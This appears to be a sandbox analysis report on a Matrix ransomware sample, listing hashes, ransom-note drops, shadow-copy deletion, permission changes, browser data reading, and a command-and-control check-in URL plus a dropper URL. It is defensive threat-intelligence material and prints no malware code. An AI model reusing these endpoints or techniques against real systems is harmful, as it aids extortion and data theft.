matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
161s
max time network
133s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-02-2022 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Score

10^/10

matrix discovery persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\fonts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Purble Place\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\More Games\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\ext\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.71\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\More Games\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
HTTP URL	3	http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=VQVVOAJK\|Admin&sid=udFY1pS4qIVw9T8F&phase=START
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Downloads\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\jfr\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n0kj3f68.default-release\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Solitaire\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\Dictionaries\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n0kj3f68.default-release\storage\permanent\chrome\idb\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n0kj3f68.default-release\OfflineCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 1948 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

8Pk9qSFt64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS 8Pk9qSFt64.exe

flow	pid	process
9	1948	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	8Pk9qSFt64.exe

Executes dropped EXE 64 IoCs

Processes:

NWbpVd9W.exe8Pk9qSFt.exe8Pk9qSFt64.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe8Pk9qSFt.exe

pid	process
760	NWbpVd9W.exe
1424	8Pk9qSFt.exe
1524	8Pk9qSFt64.exe
1608	8Pk9qSFt.exe
268	8Pk9qSFt.exe
1632	8Pk9qSFt.exe
1548	8Pk9qSFt.exe
1324	8Pk9qSFt.exe
1624	8Pk9qSFt.exe
1940	8Pk9qSFt.exe
1020	8Pk9qSFt.exe
796	8Pk9qSFt.exe
536	8Pk9qSFt.exe
1528	8Pk9qSFt.exe
108	8Pk9qSFt.exe
276	8Pk9qSFt.exe
1952	8Pk9qSFt.exe
1712	8Pk9qSFt.exe
1228	8Pk9qSFt.exe
1616	8Pk9qSFt.exe
316	8Pk9qSFt.exe
520	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
1404	8Pk9qSFt.exe
860	8Pk9qSFt.exe
536	8Pk9qSFt.exe
552	8Pk9qSFt.exe
1728	8Pk9qSFt.exe
972	8Pk9qSFt.exe
740	8Pk9qSFt.exe
272	8Pk9qSFt.exe
1256	8Pk9qSFt.exe
1544	8Pk9qSFt.exe
1736	8Pk9qSFt.exe
2028	8Pk9qSFt.exe
1268	8Pk9qSFt.exe
1920	8Pk9qSFt.exe
1600	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
992	8Pk9qSFt.exe
952	8Pk9qSFt.exe
664	8Pk9qSFt.exe
1276	8Pk9qSFt.exe
316	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
108	8Pk9qSFt.exe
1948	8Pk9qSFt.exe
268	8Pk9qSFt.exe
992	8Pk9qSFt.exe
316	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
1800	8Pk9qSFt.exe
1184	8Pk9qSFt.exe
1608	8Pk9qSFt.exe
1708	8Pk9qSFt.exe
800	8Pk9qSFt.exe
1856	8Pk9qSFt.exe
972	8Pk9qSFt.exe
1652	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
1960	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
536	8Pk9qSFt.exe
1652	8Pk9qSFt.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\MeasureDebug.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\StartUndo.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\SkipPing.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe	upx

Loads dropped DLL 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.exe8Pk9qSFt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1996	cmd.exe
1424	8Pk9qSFt.exe
1304	cmd.exe
1392	cmd.exe
804	cmd.exe
536	cmd.exe
1368	cmd.exe
1588	cmd.exe
1392	cmd.exe
1708	cmd.exe
292	cmd.exe
860	cmd.exe
560	cmd.exe
1536	cmd.exe
1816	cmd.exe
1652	cmd.exe
1512	cmd.exe
292	cmd.exe
1976	cmd.exe
1368	cmd.exe
1960	cmd.exe
1816	cmd.exe
804	cmd.exe
1520	cmd.exe
2028	cmd.exe
1300	cmd.exe
1944	cmd.exe
108	cmd.exe
1876	cmd.exe
520	cmd.exe
1384	cmd.exe
1868	cmd.exe
1740	cmd.exe
1828	cmd.exe
560	cmd.exe
828	cmd.exe
1608	cmd.exe
1588	cmd.exe
1120	cmd.exe
1880	cmd.exe
1712	cmd.exe
1384	cmd.exe
876	cmd.exe
1740	cmd.exe
972	cmd.exe
560	cmd.exe
604	cmd.exe
1608	cmd.exe
1616	cmd.exe
292	cmd.exe
1676	cmd.exe
1740	cmd.exe
1120	cmd.exe
1688	cmd.exe
876	cmd.exe
1712	cmd.exe
1600	cmd.exe
1276	cmd.exe
1380	cmd.exe
1956	cmd.exe
876	cmd.exe
1688	cmd.exe

Modifies file permissions 1 TTPs 53 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
1328	takeown.exe
1700	takeown.exe
1800	takeown.exe
800	takeown.exe
980	takeown.exe
552	takeown.exe
1000	takeown.exe
1380	takeown.exe
1296	takeown.exe
740	takeown.exe
1756	takeown.exe
1704	takeown.exe
268	takeown.exe
1320	takeown.exe
560	takeown.exe
1948	takeown.exe
1704	takeown.exe
1816	takeown.exe
1416	takeown.exe
1984	takeown.exe
1616	takeown.exe
1976	takeown.exe
1644	takeown.exe
1604	takeown.exe
1984	takeown.exe
1700	takeown.exe
1300	takeown.exe
1756	takeown.exe
1676	takeown.exe
1984	takeown.exe
964	takeown.exe
1600	takeown.exe
1944	takeown.exe
1948	takeown.exe
1544	takeown.exe
108	takeown.exe
520	takeown.exe
1512	takeown.exe
1700	takeown.exe
1072	takeown.exe
1776	takeown.exe
1800	takeown.exe
1616	takeown.exe
1756	takeown.exe
268	takeown.exe
1608	takeown.exe
1072	takeown.exe
948	takeown.exe
1876	takeown.exe
1268	takeown.exe
1276	takeown.exe
1276	takeown.exe
1528	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
